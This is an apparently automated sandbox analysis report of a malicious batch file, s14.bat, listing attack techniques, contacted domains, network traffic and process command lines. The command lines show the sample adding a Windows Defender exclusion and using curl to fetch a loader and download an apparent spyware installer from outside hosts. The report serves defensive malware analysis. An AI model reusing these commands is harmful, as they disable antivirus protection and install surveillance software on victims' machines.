Discovery: Security Software Discovery [1]; Process Discovery [1]; Virtualization/Sandbox Evasion [21]; Application Window Discovery [1]; System Information Discovery [11]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [3]; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Antivirus detection (Source | Detection | Scanner)
s14.bat | 5% | ReversingLabs
No Antivirus matches
No Antivirus matches
Domains (Source | Detection | Scanner)
cdnbaynet.com | 1% | Virustotal
URLs (Source | Detection | Scanner)
https://cdnbaynet.com/loader/link.php?prg_id=sfk | 1% | Virustotal
https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe | 1% | Virustotal
https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0 | 1% | Virustotal
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
cdnbaynet.com | 167.114.14.170 | true | false | | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
https://cdnbaynet.com/loader/link.php?prg_id=sfk | false | | unknown
URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation)
https://cdnbaynet.com/loader/link.php?prg_id=sfkkj | curl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0 | curl.exe, 0000000E.00000002.1425917834.000001C9F6150000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe6M | curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C: | curl.exe, 00000013.00000002.1628051671.000001D182570000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exetM | curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://swtb-download.spyrix-sfk.co | timeout.exe, 0000000F.00000002.1525812168.000001B142E49000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000012.00000002.1627509145.00000233D6278000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exei | curl.exe, 0000000E.00000002.1425917834.000001C9F6159000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe | curl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkhmi | curl.exe, 0000000D.00000002.1425120515.000001C1E4538000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk9j | curl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe | curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D9000.00000004.00000020.00020000.00000000.sdmp, l.13.dr | false | | unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exedM | curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe | curl.exe, 0000000E.00000002.1425917834.000001C9F6150000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0 | curl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
Contacted public IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
167.114.14.170 | cdnbaynet.com | Canada | 16276 | OVHFR | false
Other IPs
127.0.0.1
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1523868
                          Start date and time:2024-10-02 06:10:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 37s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:24
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:s14.bat
                          Detection:MAL
                          Classification:mal60.evad.winBAT@20/17@1/2
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .bat
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtCreateKey calls found.
Time | Type | Description
00:11:10 | API Interceptor | 51x Sleep call for process: powershell.exe modified
Match: OVHFR
Associated Sample Name / URL | Detection | Threat Name | Context
2Efe8RQhvR.vbs | malicious | PureLog Stealer | 91.134.98.142
http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630 | malicious | Unknown | 51.195.5.58
https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg | malicious | HTMLPhisher | 51.68.39.188
OXrZ6fj4Hq.exe | malicious | Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm | 51.255.119.242
moba-24.2-installer_M64ZB-1.exe | malicious | PureLog Stealer | 178.32.197.57
https://booking.com-partners.one/confirm/login/qAlElVVF | malicious | Unknown | 94.23.17.185
https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg= | malicious | Unknown | 149.202.238.105
Electronic_Receipt_ATT0001.htm | malicious | Unknown | 51.89.9.254
AMG Cargo Logistic.docx | malicious | Remcos | 91.134.96.177
factura proforma .docx.doc | malicious | Remcos | 91.134.96.177
Match: 74954a0c86284d0d6e1c4efefe92b521
Associated Sample Name / URL | Detection | Threat Name | Context
KYwOaWhyl6.exe | malicious | DCRat, PureLog Stealer, zgRAT | 167.114.14.170
HdXeCzyZD9.exe | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | 167.114.14.170
NCTSgL4t0B.exe | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | 167.114.14.170
TJWbSGBK0I.exe | malicious | DCRat, PureLog Stealer, zgRAT | 167.114.14.170
4tXm5yPtiy.exe | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | 167.114.14.170
UY9hUZn4CQ.exe | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | 167.114.14.170
4sTTCruY06.exe | malicious | HTMLPhisher | 167.114.14.170
Cr4745ElZg.exe | malicious | DCRat, PureLog Stealer, zgRAT | 167.114.14.170
gh3zRWl4or.exe | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | 167.114.14.170
seoI30IZZr.exe | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | 167.114.14.170
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):0.34726597513537405
                          Encrypted:false
                          SSDEEP:3:Nlll:Nll
                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                          Malicious:false
                          Preview:@...e...........................................................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\curl.exe
                          File Type:ASCII text, with no line terminators
                          Category:modified
                          Size (bytes):63
                          Entropy (8bit):4.431246742289477
                          Encrypted:false
                          SSDEEP:3:N8fhmPMdUKLR3QVL4A:280dVtgVL4A
                          MD5:F8F417F775B9CC418AAA7AD2592324C1
                          SHA1:5F2E034B5A2B39B99BA0447FF8F3898D8D1E455D
                          SHA-256:4048A5F29484C100ED0F87BBE6D462939C050E7F011B9327AC66837F9F269AA6
                          SHA-512:79E2BF550C0A463E62AEDECE5AA5ABB11DE38AADF82B8BE118BCE49F2D0542DE23D656F7C311F3839845261A1754839F507C83C0AB4003F5508DE9E6A9CA01A3
                          Malicious:false
                          Preview:https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
                          Process:C:\Windows\System32\cmd.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):11
                          Entropy (8bit):3.095795255000934
                          Encrypted:false
                          SSDEEP:3:nWDn:nWD
                          MD5:285130BE63E78277DF11A9108B363925
                          SHA1:92DD2F701821CACA090F8058BD054E840FFF88CC
                          SHA-256:CFAEB467D2A24A24D97D2E8267E68E6D7C6C805D928DA760D6706AA20608FF5F
                          SHA-512:30755D1EC6BEF8B943100F321489ABBE09306817099623DE7916EC2F1CB9CCD191EBD8939352DAC6207AEB95963A30690452037C808FC165DB12C54099377BAC
                          Malicious:false
                          Preview:sfkstart ..
                          Process:C:\Windows\System32\cmd.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):10
                          Entropy (8bit):3.321928094887362
                          Encrypted:false
                          SSDEEP:3:n8xn:n8xn
                          MD5:CDB1A48B259C774953CF6BBE7400307F
                          SHA1:EA21684C2E98E04545F277AE0536ABB632C4327C
                          SHA-256:AC4A42FD557E8EF69E1D3BED829ED3A4AD955C40F96BE52315D72C269ADE781A
                          SHA-512:AA6132B49DC4A18909D975F92FA5D3D21B5B78FAA21913B17042F8AE71CE180280C6767159F3442CB0DFA62C6E42DB39C0F62AA54C2D5DB883BF4AC509F077F7
                          Malicious:false
                          Preview:sfkdone ..
                          Process:C:\Windows\System32\curl.exe
                          File Type:ASCII text, with CR, LF line terminators
                          Category:dropped
                          Size (bytes):71
                          Entropy (8bit):4.430661028683396
                          Encrypted:false
                          SSDEEP:3:3JtLeq5nMAB/ZjMeLIINAJYqAsd4MKLvon:3JtLeEnRjMeZNBgGMKM
                          MD5:EA4CEDD0D4F05460AD58CF4A0CBC8225
                          SHA1:C1C03C8059BFC82DAB7ADBAFE37EC997A2C8362E
                          SHA-256:63DBB13B2480370B57B7B78371E78B82F3E03961499428B69ABA0B73E580CFB0
                          SHA-512:DCF4AC8915D0D1B29F7329A3F617EF291C1FB0DED3B5D270E9CABF0F8821C7A2647262B513A345C8C6A1B4CB91007F5C1A714009A99849954504A5016843A683
                          Malicious:false
                          Preview:curl: no URL specified!..curl: try 'curl --help' for more information..
                          Process:C:\Windows\System32\reg.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):243
                          Entropy (8bit):5.025903567998292
                          Encrypted:false
                          SSDEEP:6:rbsd3u6eWFF60OckSi23oH+H1gFyeWFF60OckSi23fksgeWFF60OckSi23fhn:QNFFvO4ZYeVAyNFFvO4ZssgNFFvO4ZZn
                          MD5:5F73D6EB745036C1AFF17E55835C42B2
                          SHA1:603662F0180E4B5AACD9DCDFB01738C0D29F7A3F
                          SHA-256:11C4731706427EC108A02F9FD527EC7DEEA25F012233B5F6EEC8D10F615CB631
                          SHA-512:E9B3B307A6CBC6EE6219347ED24246AFE1197CEE2A1AC621C7E8035DD32B9CAB256F80155D66E7580AFEE7022264CEE105EE08A380BE5960C30E26D3E2277E43
                          Malicious:false
                          Preview:..HKEY_USERS\S-1-5-19\Environment.. Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;.. TEMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp.. TMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp....
                          File type:ASCII text, with CRLF line terminators
                          Entropy (8bit):5.408660186830059
                          TrID:
                            File name:s14.bat
                            File size:13'530 bytes
                            MD5:db54c87742c96b03caeb3774ecb51438
                            SHA1:f6a559b83cbc3b82cb0a5c2acb64b6d4038cb593
                            SHA256:634c59030c60c10818f142277376c9ba06d14110f41e544f6f3bae822352d0b9
                            SHA512:b33e9c706401d314b9501285a8a7034ae4961cda5ff40738eb4165ae673a33faf400fa1e877f1990372a9db2913ae713f1268ad91090508a5558df6e3a29b837
                            SSDEEP:384:DoXJPUYc9qXr+0Ac2/ij77HrPkICI0kY1:ChUporHZcij77HrsIckY1
                            TLSH:98529E0B309A5E8D9E10C619EA8C24CB5E9BA4F30034ABDFF01B81CF109E7A45F56A65
                            File Content Preview:rem ag37j8zcu4txzhm6xg8d0ssqlbwix9xkrn36mj1x..rem sx89jxmimypuir5iokjx7wmk3dm8q0xgyy6wjnxqav9ath67..@echo off..rem ei1nivgqp3jrx5t0pplb5cdof48ssb0y8n88gfs5c1nq5sok9i44a25hovzi5xivjl647u0..rem 14v2htbys8eobihgpunp2u6truudvdmggcajd8nje626g38z0h3mjaxklicbvd9
                            Icon Hash:9686878b929a9886
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Oct 2, 2024 06:11:22.011135101 CEST | 49707 | 443 | 192.168.2.7 | 167.114.14.170
                            Oct 2, 2024 06:11:22.011266947 CEST | 443 | 49707 | 167.114.14.170 | 192.168.2.7
                            Oct 2, 2024 06:11:22.011362076 CEST | 49707 | 443 | 192.168.2.7 | 167.114.14.170
                            Oct 2, 2024 06:11:22.044393063 CEST | 49707 | 443 | 192.168.2.7 | 167.114.14.170
                            Oct 2, 2024 06:11:22.044449091 CEST | 443 | 49707 | 167.114.14.170 | 192.168.2.7
                            Oct 2, 2024 06:11:22.531233072 CEST | 443 | 49707 | 167.114.14.170 | 192.168.2.7
                            Oct 2, 2024 06:11:22.531337976 CEST | 49707 | 443 | 192.168.2.7 | 167.114.14.170
                            Oct 2, 2024 06:11:22.534945011 CEST | 49707 | 443 | 192.168.2.7 | 167.114.14.170
                            Oct 2, 2024 06:11:22.534979105 CEST | 443 | 49707 | 167.114.14.170 | 192.168.2.7
                            Oct 2, 2024 06:11:22.535242081 CEST | 443 | 49707 | 167.114.14.170 | 192.168.2.7
                            Oct 2, 2024 06:11:22.537683010 CEST | 49707 | 443 | 192.168.2.7 | 167.114.14.170
                            Oct 2, 2024 06:11:22.583409071 CEST | 443 | 49707 | 167.114.14.170 | 192.168.2.7
                            Oct 2, 2024 06:11:23.132206917 CEST | 443 | 49707 | 167.114.14.170 | 192.168.2.7
                            Oct 2, 2024 06:11:23.132282972 CEST | 443 | 49707 | 167.114.14.170 | 192.168.2.7
                            Oct 2, 2024 06:11:23.132364988 CEST | 49707 | 443 | 192.168.2.7 | 167.114.14.170
                            Oct 2, 2024 06:11:23.203397036 CEST | 49707 | 443 | 192.168.2.7 | 167.114.14.170
                            Oct 2, 2024 06:11:23.203476906 CEST | 443 | 49707 | 167.114.14.170 | 192.168.2.7
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Oct 2, 2024 06:11:21.905926943 CEST | 51837 | 53 | 192.168.2.7 | 1.1.1.1
                            Oct 2, 2024 06:11:21.918402910 CEST | 53 | 51837 | 1.1.1.1 | 192.168.2.7
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Oct 2, 2024 06:11:21.905926943 CEST | 192.168.2.7 | 1.1.1.1 | 0xeae4 | Standard query (0) | cdnbaynet.com | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Oct 2, 2024 06:11:21.918402910 CEST | 1.1.1.1 | 192.168.2.7 | 0xeae4 | No error (0) | cdnbaynet.com | (none) | 167.114.14.170 | A (IP address) | IN (0x0001) | false
                            • cdnbaynet.com
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.7 | 49707 | 167.114.14.170 | 443 | 7656 | C:\Windows\System32\curl.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-10-02 04:11:22 UTC | 110 | OUT | GET /loader/link.php?prg_id=sfk HTTP/1.1
                            Host: cdnbaynet.com
                            User-Agent: sfk-dst-loader-2.0
                            Accept: */*
                            2024-10-02 04:11:23 UTC | 165 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.17.3
                            Date: Wed, 02 Oct 2024 04:11:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            2024-10-02 04:11:23 UTC | 74 | IN | Data Raw: 33 66 0d 0a 68 74 74 70 73 3a 2f 2f 73 77 74 62 2d 64 6f 77 6e 6c 6f 61 64 2e 73 70 79 72 69 78 2d 73 66 6b 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 73 66 6b 2f 73 66 6b 5f 73 65 74 75 70 2e 65 78 65 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 3fhttps://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe0

                            Target ID:1
                            Start time:00:11:06
                            Start date:02/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" "
                            Imagebase:0x7ff6bb520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:00:11:06
                            Start date:02/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:00:11:06
                            Start date:02/10/2024
                            Path:C:\Windows\System32\reg.exe
                            Wow64 process (32bit):false
                            Commandline:reg query "HKU\S-1-5-19\Environment"
                            Imagebase:0x7ff663340000
                            File size:77'312 bytes
                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:7
                            Start time:00:11:06
                            Start date:02/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
                            Imagebase:0x7ff741d30000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:00:11:20
                            Start date:02/10/2024
                            Path:C:\Windows\System32\curl.exe
                            Wow64 process (32bit):false
                            Commandline:curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
                            Imagebase:0x7ff6c9e80000
                            File size:530'944 bytes
                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:14
                            Start time:00:11:22
                            Start date:02/10/2024
                            Path:C:\Windows\System32\curl.exe
                            Wow64 process (32bit):false
                            Commandline:curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
                            Imagebase:0x7ff6c9e80000
                            File size:530'944 bytes
                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:15
                            Start time:00:11:22
                            Start date:02/10/2024
                            Path:C:\Windows\System32\timeout.exe
                            Wow64 process (32bit):false
                            Commandline:timeout 10
                            Imagebase:0x7ff6cf7b0000
                            File size:32'768 bytes
